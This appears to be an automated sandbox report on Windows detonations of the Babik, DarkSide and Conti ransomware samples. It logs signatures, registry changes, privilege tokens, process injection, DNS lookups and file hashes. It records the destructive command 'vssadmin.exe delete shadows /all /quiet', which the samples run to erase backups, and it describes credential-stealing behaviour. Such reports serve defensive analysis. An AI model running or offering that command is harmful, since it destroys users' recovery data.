PID 2580 wrote to memory of 2772	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2772	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2772 wrote to memory of 2816	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2772 wrote to memory of 2816	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2772 wrote to memory of 2816	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt

MD5	b6e97028103bc6b18214f4b2bd0e0d23
SHA1	4c202c77782d55af635c28fa71b2ba58b294415e
SHA256	db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512	214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (190) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f3d73b46.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f3d73b46.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.f3d73b46\ = "f3d73b46"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\f3d73b46\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f3d73b46.ico"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2628 wrote to memory of 1804	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1804	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1804	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1804	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	1.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	78.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	39.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	24.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	124.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	64.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	68.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	72.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	74.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	76.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	80.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	0.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	82.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	84.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	97.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	90.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	89.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	96.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	85.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	98.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	81.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	102.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	77.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	104.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	67.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	108.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	65.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	59.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	114.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	116.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	120.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	62.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	60.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	58.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	56.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	52.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	75.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	48.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	70.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	83.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	87.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	91.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	95.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	111.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	115.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	119.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	123.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	127.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	61.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	63.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	69.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	79.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	93.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	101.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	105.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	113.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	117.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	121.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	125.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	73.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	86.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	92.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	88.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	94.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	100.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	106.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	110.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	112.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	118.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	122.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	128.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	126.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	99.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	103.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	107.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	109.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	242.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	234.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	183.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	135.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	158.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	136.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	150.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	212.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	230.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	206.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	174.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	186.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	180.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	156.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	138.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	134.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	137.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	244.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	178.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	139.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	141.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	146.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	143.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	140.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	149.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	132.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	130.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	157.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	252.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	216.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	175.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	248.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	179.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	220.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	187.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	250.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	182.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	195.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	199.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	224.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	207.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	203.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	240.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	228.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	238.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	129.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	232.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	131.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	236.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	225.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	226.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	133.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	222.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	165.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	218.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	214.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	169.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	177.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	208.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	181.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	189.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	193.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	204.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	166.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	202.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	200.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	198.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	196.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	194.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	176.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	190.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	188.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	235.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	229.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	237.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	241.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	243.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	249.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	253.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	191.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	173.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	197.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	205.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	217.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	221.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	215.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	219.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	223.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	245.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	247.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	239.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	231.0.127.10.in-addr.arpa	udp

Files

memory/1804-5-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp

memory/1804-6-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/1804-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1804-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

memory/1804-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

memory/1804-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5	c88f027adf377f4702d01edd42411d17
SHA1	cb0f93ffeaab4a1e7d9c22ce332d9762aa5099dd
SHA256	f39989c2048da0dfe98d95b77e17a972bd41e8647792683ef33e33694d0ee024
SHA512	59f985af5185a5f6f07c7f786d11a0bc7915fba1891a244be65e6afaa67407d3936d287c51988d24c4ca01052fbfee01c690991bd627cd91f934615268017811

C:\Users\Admin\README.f3d73b46.TXT

MD5	d4e176b40c4ea17f4870c34fad926d6e
SHA1	2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256	7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512	feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (8072) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
